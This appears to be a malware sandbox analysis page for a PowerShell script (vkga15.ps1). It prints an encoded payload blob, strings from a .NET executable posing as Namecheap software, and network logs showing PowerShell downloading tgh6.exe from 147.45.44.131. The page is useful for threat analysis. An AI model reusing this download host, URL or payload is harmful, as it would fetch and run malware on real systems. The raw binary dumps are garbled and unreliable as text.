A5FSxRDDG4sE0saURx9CH0OE0EDNgpcAn0fCV0kcBxBQ04IFU0IbQlmDHAeFktBPhhPHns7HkofewldRD5bRw5dN3ckTT5aWg5NPloOTT5aWg5NPloOTT4BdyRNPloOTT5aWg5NPloOTT5aWg5NPloOTT4OElwCaVpACGlaP1YOewpaBHEUUgdWE3AOTT5aWg5NPloOTT5aWg5NPloOTWN3cA5NPloOTT5aWg5NPloOTT4HdyRgFFoOTT5aWg5NPloOTT5aWg4EcA4OHncAH2ELVxdPCntaRw4ucRRYCGwOLkEkcA4dXzYcE0IIXANaCG1WWkgEch9vCXoIH10ePlEOVS5TQSNnPloOTT5aWg5NPloOTT5aWkcDalpdBGQfNUglextKCGwJWhNNXRVAG3sIDnoCVxRaXixSHEcBezhXGXsJVg4LdxZLLHoeCEsebVoFTSZOUxVgFHckTT5aWg5NPloOTT5aWg5NPhNAGT4UH1kkcxtJCFwbCUtNI1p4BGwOD08BXxZCAn0/AgYdbBVNCG0JM0ALcVR+H3EZH10eVhtACXIfVg4EcxtJCFwbCUtBPglHF3s1HGcAfx1LQT5LSBxVJlYOWypTQSNnPloOTT5aWg5NPloOTT5aWkcLP
Data received	cheap!Copyright Â© Namecheap 2024)$228ADC38-C619-4FED-AED8-9DC6343E50C21.7.3.9I.NETFramework,Version=v4.8TFrameworkDisplayName.NET Framework 4.8"ConsoleApp66.Global+<Rdi>d__0ConsoleApp66.Ecx+<Cl>d__0$ConsoleApp66.Program+<Main>d__0P¨j¨ \¨_CorExeMainmscoree.dllÿ% @ P8hðÀ``4VS_VERSION_INFO½ïþ ?DVarFileInfo$Translation°ÀStringFileInfo000004b0, CommentsNamecheap4 CompanyNameNamecheap< FileDescriptionNamecheap0FileVersion1.7.3.9<
Data received	InternalNameNamecheap.exe\LegalCopyrightCopyright © Namecheap 2024< LegalTrademarksNamecheapDOriginalFilenameNamecheap.exe4 ProductNameNamecheap4ProductVersion1.7.3.98Assembly Version1.7.3.9Äêï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> \|8
Data received

Poweshell is sending data to a remote host (1 event)

Data sent

GET /files/tgh6.exe HTTP/1.1 Host: 147.45.44.131 Connection: Keep-Alive

Communicates with host for which no DNS query was performed (1 event)

host

147.45.44.131

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send Sept. 25, 2024, 4:54 p.m.	buffer: GET /files/tgh6.exe HTTP/1.1 Host: 147.45.44.131 Connection: Keep-Alive socket: 1540 sent: 77	1	77	0

An executable file was downloaded by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
recv Sept. 25, 2024, 4:54 p.m.	buffer: HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 07:54:24 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 23 Sep 2024 13:31:10 GMT ETag: "9400-622c966e9419f" Accept-Ranges: bytes Content-Length: 37888 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELËwnðà"0z¨ À@ `(¨OÀðà¨ H.text `.rsrcðÀ@@.relocà@B\¨H¨%d07( }}}\|(+\|( ( 0/( } } \| (+\| ( ( 0Ðrp( ~( ( o s s o ( r¾op( o o! &o ( ràop( o o! &o" %%¢o# o$ ( r pp( o o% ( r$pp( o o& %¢%¢o' &( 0d(( o) iYpai+ +(a aÒ o* Y3 + X Xi2ÑiY(+( 0/(, } }\| (+\| (. ( 0( o/ (0 ( 0L( r>pp( o ( r¨pp( o ( rSqp( o 0È{ ,s1 },@{{o2 o3 (4 -<% }}\|(+Þn{\|þ% }(6 s7 Þ//{,{o8 Ü þ}\| (9 Þþ}\|(: n6\|(; 0´{ ,9~(o< (= -<% } }\| (+Þp{ \|þ% } (? ~(Þ/ ,o8 ÜÞþ} \| (@ Þþ} \| (A g t6\| (B 0 { ,4(oC (D -<% }}\| (+ÞP{\|þ% }(F &Þþ}\| (G Þþ}\| (H ]d6\| (I *BSJBv4.0.30319l#~T#StringsX q#USø~#GUID\#BlobW ú3- I râ?O?ã _Å¦6=÷ Õ XÊ"?&úº?S?F?A-? åzq §Ñçé??öi-ÛÉÑºÑ5O received: 2720 socket: 1540	1	2720	0

vkga15.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All